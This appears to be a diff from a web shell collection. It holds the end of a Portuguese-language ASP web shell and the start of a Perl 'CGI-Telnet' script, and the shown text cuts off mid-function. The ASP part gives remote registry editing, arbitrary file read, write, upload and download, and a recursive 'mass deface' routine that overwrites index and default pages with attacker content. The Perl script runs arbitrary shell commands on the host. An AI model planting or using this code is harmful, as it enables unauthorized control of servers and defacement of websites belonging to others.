Response.Write "<tr><td><font face=""arial"" size=""1"">REG_EXPAND_SZ </td><td><font face=""arial"" size=""1""> string expand<6E>vel (ex. ""%windir%\\calc.exe"") </td><td><font face=""arial"" size=""1""> string </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_MULTI_SZ </td><td><font face=""arial"" size=""1""> array de strings </td><td><font face=""arial"" size=""1""> VBArray de strings </td></tr></table>"
Response.Write "<br><br><FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
Response.Write "<table><tr><td><font face=""arial"" size=""1"">KEY: </td><td><input type=""text"" name=""key""> <font face=""arial"" size=""1""><br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )</td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">VALUE:</td><td><input type=""text"" name=""value""></td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">TYPE:</td><td><SELECT NAME=""type"">"
Response.Write "<OPTION VALUE=""1"">REG_SZ </option>"
Response.Write "<OPTION VALUE=""2"">REG_DWORD </option>"
Response.Write "<OPTION VALUE=""3"">REG_BINARY </option>"
Response.Write "<OPTION VALUE=""4"">REG_EXPAND_SZ </option>"
Response.Write "<OPTION VALUE=""5"">REG_MULTI_SZ </option></select><br>"
Response.Write "<input type=""hidden"" name=""regaction"" value=""w"">"
Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
Response.Write "<input type=""hidden"" name=""process"" value=""yes""></td></tr>"
Response.Write "<tr><td></td><td><input type=""submit"" value=""OK""></form></td></tr></table>"
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
End If
Case "r"
If Trim(Request.QueryString("process")) = "yes" Then
Response.Write "<font face=""arial"" size=""2"">" & Trim(Request.QueryString("key")) & "<br>"
Response.Write "Valor: <b>" & WshShell.RegRead (Trim(Request.QueryString("key")))
Else
Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> <br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
Response.Write "<input type=""hidden"" name=""regaction"" value=""r"">"
Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
Response.Write "<input type=""submit"" value=""OK""></form>"
End If
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
Case "d"
If Trim(Request.QueryString("process")) = "yes" Then
teste = WshShell.RegDelete (Trim(Request.QueryString("key")))
Response.Write "Chave <b>" & Trim(Request.QueryString("key")) & " </b>deletada"
Else
Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
Response.Write "<input type=""hidden"" name=""regaction"" value=""d"">"
Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
Response.Write "<input type=""submit"" value=""OK""></form>"
End If
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
Case Else
Response.Write "<font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=w"">ESCREVER CHAVE</a><br><br>"
Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=r"">LER CHAVE</a><br><br>"
Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=d"">DELETAR CHAVE</a><br>"
End Select
Set WshShell = Nothing
Case "txtview"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp & "<font face=""arial"" size=""2"">"
file = Replace(Trim(Request.QueryString("file")),"|","\")
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.OpenTextFile(file)
Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
Set a = Nothing
Set fso = Nothing
Case "txtedit"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Request.Form.Count = 0 Then
file = Replace(Trim(Request.QueryString("file")),"|","\")
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.OpenTextFile(file)
Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
Response.Write "<textarea cols='85' rows='25' name=""content"" wrap=""physical"" >" & Server.HTMLEncode(a.ReadAll) & "</textarea><br>"
Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("file")) & """>"
Response.Write "<input type=""submit"" name=""savemethod"" value=""Save"">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=""submit"" name=""savemethod"" value=""Save as""></form>"
Set a = Nothing
Set fso = Nothing
Else
Select Case Trim(Request.Form("savemethod"))
Case "Save"
Set fso = CreateObject("Scripting.FileSystemObject")
novotexto = Trim(Request.Form("content"))
novotexto = Split(novotexto,vbCrLf)
Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2)
For i = 0 To UBound(novotexto)
objstream.WriteLine(novotexto(i))
Next
objstream.Close
Set objstream = Nothing
Response.Write "Texto salvo: <b>" & Replace(Trim(Request.Form("path")),"|","\") & "</b>"
Case "Save as"
Set fso = CreateObject("Scripting.FileSystemObject")
novotexto = Trim(Request.Form("content"))
novotexto = Split(novotexto,vbCrLf)
caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
Set objstream = fso.CreateTextFile(caminho,true,false)
For i = 0 To UBound(novotexto)
objstream.WriteLine(novotexto(i))
Next
objstream.Close
Set objstream = Nothing
Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
Response.Write "<input type=""text"" name=""filename"" value=""" & showobj(Replace(Trim(Request.Form("path")),"|","\")) & """><br>"
Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.Form("path")) & """>"
Response.Write "<input type=""submit"" name=""savemethod2"" value=""Save""></form>"
Case Else
caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename"))
MyFile.Move (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & destino & "</b> salvo!"
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
End If
End Select
End If
Case "download"
Response.Buffer = True
Response.Clear
strFileName = Replace(Trim(Request.QueryString("file")),"|","\")
strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\"))
strFileType = Request.QueryString("type")
if strFileType = "" then strFileType = "application/download"
Set fso = Server.CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(strFilename)
intFilelength = f.size
Set f = Nothing
Set fso = Nothing
Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile
Response.AddHeader "Content-Length", intFilelength
Response.Charset = "UTF-8"
Response.ContentType = strFileType
Set Stream = Server.CreateObject("ADODB.Stream")
Stream.Open
Stream.type = 1
Stream.LoadFromFile strFileName
Response.BinaryWrite Stream.Read
Response.Flush
Stream.Close
Set Stream = Nothing
Case "upload"
If Request.QueryString("processupload") <> "yes" Then
Response.Write "<FORM METHOD=""POST"" ENCTYPE=""multipart/form-data"" ACTION=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&processupload=yes&path=" & Request.QueryString("path") & """>"
Response.Write "<TABLE BORDER=0>"
Response.Write "<tr><td><font face=""arial"" size=""2""><b>Select a file to upload:</b><br><INPUT TYPE=FILE SIZE=50 NAME=""FILE1""></td></tr>"
Response.Write "<tr><td align=""center""><font face=""arial"" size=""2""><INPUT TYPE=SUBMIT VALUE=""Upload!""></td></tr>"
Response.Write "</TABLE>"
Else
Set Uploader = New FileUploader
Uploader.Upload()
If Uploader.Files.Count = 0 Then
Response.Write "File(s) not uploaded."
Else
For Each File In Uploader.Files.Items
File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\")
Response.Write "File Uploaded: " & File.FileName & "<br>"
Response.Write "Size: " & File.FileSize & " bytes<br>"
Response.Write "Type: " & File.ContentType & "<br><br>"
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
Next
End If
End If
Case "mass"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo)
On Error Resume Next
Set MonRep = ObjFSO.GetFolder(caminhodomass)
Set ColFolders = MonRep.SubFolders
for each folderItem in ColFolders
destino1 = folderItem.path & "\index.htm"
destino2 = folderItem.path & "\index.html"
destino3 = folderItem.path & "\index.asp"
destino4 = folderItem.path & "\index.cfm"
destino5 = folderItem.path & "\index.php"
destino6 = folderItem.path & "\default.htm"
destino7 = folderItem.path & "\default.html"
destino8 = folderItem.path & "\default.asp"
destino9 = folderItem.path & "\default.cfm"
destino10 = folderItem.path & "\default.php"
MeuArquivo.Copy(destino1)
MeuArquivo.Copy(destino2)
MeuArquivo.Copy(destino3)
MeuArquivo.Copy(destino4)
MeuArquivo.Copy(destino5)
MeuArquivo.Copy(destino6)
MeuArquivo.Copy(destino7)
MeuArquivo.Copy(destino8)
MeuArquivo.Copy(destino9)
MeuArquivo.Copy(destino10)
Response.Write "<table><tr><td><font face='arial' size='2'>&lt;DIR&gt; " & folderItem.path & "</td>"
If Err.Number = 0 Then
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>DONE!</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr></table>"
End If
Err.Number = 0
Response.Flush
If metodo = "brute" Then
Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo)
End If
next
End Sub
Sub brutemass(caminho,massaction)
If massaction = "test" Then
On Error Resume Next
Set MonRep = ObjFSO.GetFolder(caminho)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
for each folderItem in ColFolders
Set TotalFolders = ObjFSO.GetFolder(folderItem.path)
Set EachFolder = TotalFolders.SubFolders
Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
maindestino = folderItem.path & "\"
MeuArquivo.Copy(maindestino)
Response.Write "<tr><td><b><font face='arial' size='2'>&lt;DIR&gt; " & maindestino & "</b></td>"
If Err.Number = 0 Then
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
End If
Err.Number = 0
Response.Flush
If EachFolder.count > 0 Then
masscontador = 0
for each subpasta in EachFolder
masscontador = masscontador + 1
destino = subpasta.path & "\"
If masscontador = 1 Then
destinofinal = destino
pathfinal = subpasta.path
Err.Number = 0
MeuArquivo.Copy(destinofinal)
Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(pathfinal) & "</td>"
If Err.Number = 0 Then
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
End If
Err.Number = 0
Response.Flush
Else
MeuArquivo.Copy(destino)
Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(subpasta.path) & "</td>"
If Err.Number = 0 Then
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
End If
Err.Number = 0
Response.Flush
End If
next
masscontador = 0
End If
Response.Write "</table><br>"
Call brutemass(folderItem.path & "\","test")
next
Set MonRep = Nothing
Set ColFolders = Nothing
Set ColFiles0 = Nothing
Else
If Request.Form.Count = 0 Then
Response.Write "<font face=""arial"" size=""2""><br><br><b>Brute:</b> copia os arquivos do deface para todas as pastas e subpastas (todos os n<>veis) do diret<65>rio escolhido (mais demorado). O tempo do deface vai variar de acordo com o numero TOTAL de diret<65>rios.<br><br>"
Response.Write "<b>Single:</b> copia os arquivos do deface apenas para as pastas (primeiro n<>vel) do diret<65>rio escolhido. N<>o inclui subpastas.<br><br>"
Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc"">"
Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>"
Response.Write "<center><font face=""arial"" size=""2"">Insira o c<>digo:<br>"
Response.Write "<textarea cols='65' rows='15' name=""content""></textarea><br>"
Response.Write "<input type=""radio"" name=""massopt"" value=""brute"" checked>Brute&nbsp;&nbsp;&nbsp;"
Response.Write "<input type=""radio"" name=""massopt"" value=""single"">Single<br>"
Response.Write "<input type=""submit"" value=""w00t!""></center>"
Response.Write "</form>"
Else
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
arquivomassdfc = patharquivotxt & "teste.txt"
Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False)
vetordelinhas = Split(Request.Form("content"),VbCrLf)
For i = 0 To UBound(vetordelinhas)
Arquivotxt.WriteLine(vetordelinhas(i))
Next
Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc)
If Request.Form("massopt") = "single" Then
Call themassdeface(caminho,"single",ObjFSO,MeuArquivo)
ElseIf Request.Form("massopt") = "brute" Then
Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo)
End If
End If
End If
End Sub
If Trim(Request.QueryString("massact")) = "test" Then
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
arquivo = patharquivotxt & "_vti_cnf.log"
Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True)
Set MeuArquivo = ObjFSO.GetFile(arquivo)
Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test")
ElseIf Trim(Request.QueryString("massact")) = "dfc" Then
Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc")
End If
Case Else
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Call showcontent()
End Select
If Err.Number <> 0 Then
Response.Write "<br><font face='arial' size='2'>ERRO: " & Err.Number & "<br><br><b>" & UCase(Err.Description) & "</b><br>Acesse o <b>ONLINE HELP</b> para a explica<63><61>o do erro"
End If
Response.Write endcode
%>

697
138shell/T/telnet.cgi.txt Normal file
View File

@@ -0,0 +1,697 @@
#!/usr/bin/perl
#------------------------------------------------------------------------------
# Copyright and Licence
#------------------------------------------------------------------------------
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
#
# Copyright (C) 2001 Rohitab Batra
# Permission is granted to use, distribute and modify this script so long
# as this copyright notice is left intact. If you make changes to the script
# please document them and inform me. If you would like any changes to be made
# in this script, you can e-mail me.
#
# Author: Rohitab Batra
# Author e-mail: rohitab@rohitab.com
# Author Homepage: http://www.rohitab.com/
# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
# Product Support: http://www.rohitab.com/support/
# Discussion Forum: http://www.rohitab.com/discuss/
# Mailing List: http://www.rohitab.com/mlist/
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# Installation
#------------------------------------------------------------------------------
# To install this script
#
# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
# your server. For most servers, you may not need to modify this.
# 2. Change the password in the Configuration section below.
# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
# Configuration Section below.
# 4. Upload the script to a directory on your server which has permissions to
# execute CGI scripts. This is usually cgi-bin. Make sure that you upload
# the script in ASCII mode.
# 5. Change the permission (CHMOD) of the script to 755.
# 6. Open the script in your web browser. If you uploaded the script in
# cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
# 7. Login using the password that you specified in Step 2.
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# Configuration: You need to change only $Password and $WinNT. The other
# values should work fine for most systems.
#------------------------------------------------------------------------------
$Password = ""; # Change this. You will need to enter this
# to login.
$WinNT = 0; # You need to change the value of this to 1 if
# you're running this script on a Windows NT
# machine. If you're running it on Unix, you
# can leave the value as it is.
$NTCmdSep = "&"; # This character is used to seperate 2 commands
# in a command line on Windows NT.
$UnixCmdSep = ";"; # This character is used to seperate 2 commands
# in a command line on Unix.
$CommandTimeoutDuration = 100000; # Time in seconds after commands will be killed
# Don't set this to a very large value. This is
# useful for commands that may hang or that
# take very long to execute, like "find /".
# This is valid only on Unix servers. It is
# ignored on NT Servers.
$ShowDynamicOutput = 1; # If this is 1, then data is sent to the
# browser as soon as it is output, otherwise
# it is buffered and send when the command
# completes. This is useful for commands like
# ping, so that you can see the output as it
# is being generated.
# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
#------------------------------------------------------------------------------
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#------------------------------------------------------------------------------
sub ReadParse
{
local (*in) = @_ if @_;
local ($i, $loc, $key, $val);
$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
if($ENV{'REQUEST_METHOD'} eq "GET")
{
$in = $ENV{'QUERY_STRING'};
}
elsif($ENV{'REQUEST_METHOD'} eq "POST")
{
binmode(STDIN) if $MultipartFormData & $WinNT;
read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
}
# handle file upload data
if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
{
$Boundary = '--'.$1; # please refer to RFC1867
@list = split(/$Boundary/, $in);
$HeaderBody = $list[1];
$HeaderBody =~ /\r\n\r\n|\n\n/;
$Header = $`;
$Body = $';
$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
$in{'filedata'} = $Body;
$Header =~ /filename=\"(.+)\"/;
$in{'f'} = $1;
$in{'f'} =~ s/\"//g;
$in{'f'} =~ s/\s//g;
# parse trailer
for($i=2; $list[$i]; $i++)
{
$list[$i] =~ s/^.+name=$//;
$list[$i] =~ /\"(\w+)\"/;
$key = $1;
$val = $';
$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} = $val;
}
}
else # standard post data (url encoded, not multipart)
{
@in = split(/&/, $in);
foreach $i (0 .. $#in)
{
$in[$i] =~ s/\+/ /g;
($key, $val) = split(/=/, $in[$i], 2);
$key =~ s/%(..)/pack("c", hex($1))/ge;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} .= "\0" if (defined($in{$key}));
$in{$key} .= $val;
}
}
}
#------------------------------------------------------------------------------
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#------------------------------------------------------------------------------
sub PrintPageHeader
{
$EncodedCurrentDir = $CurrentDir;
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
print "Content-type: text/html\n\n";
print <<END;
<html>
<head>
<title>CGI-Telnet Version 1.0</title>
$HtmlMetaHeader
</head>
<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
<b><font color="#000080" size="2">#</font></b></td>
<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to
$ServerName</b></font></td>
</tr>
<tr>
<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
<a href="$ScriptLocation?a=logout">Disconnect</a> |
<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
</font></td>
</tr>
</table>
<font color="#C0C0C0" size="3">
END
}
#------------------------------------------------------------------------------
# Prints the Login Screen
#------------------------------------------------------------------------------
sub PrintLoginScreen
{
$Message = q$<pre><font color="#669999"> _____ _____ _____ _____ _ _
/ __ \| __ \|_ _| |_ _| | | | |
| / \/| | \/ | | ______ | | ___ | | _ __ ___ | |_
| | | | __ | | |______| | | / _ \| || '_ \ / _ \| __|
| \__/\| |_\ \ _| |_ | | | __/| || | | || __/| |_
\____/ \____/ \___/ \_/ \___||_||_| |_| \___| \__| 1.0
</font><font color="#FF0000"> ______ </font><font color="#AE8300"><3E> 2001, Rohitab
Batra</font><font color="#FF0000">
.-&quot; &quot;-.
/ \
| |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font
color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font
color="#FF0000">/</font><font color="#808080">_______________________
</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font
color="#808080">&lt;________</font><font color="#FF0000">|-\IIIIII/-|</font><font
color="#808080">________________________&gt;</font><font color="#FF0000">
)_/ \ /
(@ `--------`
</font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
$;
#'
print <<END;
<code>
Trying $ServerName...<br>
Connected to $ServerName<br>
Escape character is ^]
<code>$Message
END
}
#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
print <<END;
<code>
<br>login: admin<br>
password:<br>
Login incorrect<br><br>
</code>
END
}
#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login">
login: admin<br>
password:<input type="password" name="p">
<input type="submit" value="Enter">
</form>
</code>
END
}
#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
print "</font></body></html>";
}
#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{''}
#------------------------------------------------------------------------------
sub GetCookies
{
@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
foreach $cookie(@httpcookies)
{
($id, $val) = split(/=/, $cookie);
$Cookies{$id} = $val;
}
}
#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
print "<code>Connection closed by foreign host.<br><br></code>";
}
#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
&PrintPageHeader("p");
&PrintLogoutScreen;
&PrintLoginScreen;
&PrintLoginForm;
&PrintPageFooter;
}
#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#------------------------------------------------------------------------------
sub PerformLogin
{
if($LoginPassword eq $Password) # password matched
{
print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
&PrintPageHeader("c");
&PrintCommandLineInputForm;
&PrintPageFooter;
}
else # password didn't match
{
&PrintPageHeader("p");
&PrintLoginScreen;
if($LoginPassword ne "") # some password was entered
{
&PrintLoginFailedMessage;
}
&PrintLoginForm;
&PrintPageFooter;
}
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="command">
<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" name="c">
<input type="submit" value="Enter">
</form>
</code>
END
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input type="text" name="f" size="35"><br><br>
Download: <input type="submit" value="Begin">
</form>
</code>
END
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;
<code>
<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input type="file" name="f" size="35"><br><br>
Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
Overwrite if it Exists<br><br>
Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="upload">
</form>
</code>
END
}
#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
if(!$WinNT)
{
alarm(0);
print <<END;
</xmp>
<code>
Command exceeded maximum time of $CommandTimeoutDuration second(s).
<br>Killed it!
<code>
END
&PrintCommandLineInputForm;
&PrintPageFooter;
exit;
}
}
#------------------------------------------------------------------------------
# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
#------------------------------------------------------------------------------
sub ExecuteCommand
{
if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
{
# we change the directory internally. The output of the
# command is not displayed.
$OldDir = $CurrentDir;
$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
chop($CurrentDir = `$Command`);
&PrintPageHeader("c");
$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
print "<code>$Prompt $RunCommand</code>";
}
else # some other command, display the output
{
&PrintPageHeader("c");
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print "<code>$Prompt $RunCommand</code><xmp>";
$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
if(!$WinNT)
{
$SIG{'ALRM'} = \&CommandTimeout;
alarm($CommandTimeoutDuration);
}
if($ShowDynamicOutput) # show output as it is generated
{
$|=1;
$Command .= " |";
open(CommandOutput, $Command);
while(<CommandOutput>)
{
$_ =~ s/(\n|\r\n)$//;
print "$_\n";
}
$|=0;
}
else # show output after command completes
{
print `$Command`;
}
if(!$WinNT)
{
alarm(0);
}
print "</xmp>";
}
&PrintCommandLineInputForm;
&PrintPageFooter;
}
#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#------------------------------------------------------------------------------
sub PrintDownloadLinkPage
{
local($FileUrl) = @_;
if(-e $FileUrl) # if the file exists
{
# encode the file link so we can send it to the browser
$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
&PrintPageHeader("c");
print <<END;
<code>
Sending File $TransferFile...<br>
If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>.
</code>
END
&PrintCommandLineInputForm;
&PrintPageFooter;
}
else # file doesn't exist
{
&PrintPageHeader("f");
print "<code>Failed to download $FileUrl: $!</code>";
&PrintFileDownloadForm;
&PrintPageFooter;
}
}
#------------------------------------------------------------------------------
# This function reads the specified file from the disk and sends it to the
# browser, so that it can be downloaded by the user.
# Argument 1: Fully qualified pathname of the file to be sent.
#------------------------------------------------------------------------------
sub SendFileToBrowser
{
local($SendFile) = @_;
if(open(SENDFILE, $SendFile)) # file opened for reading
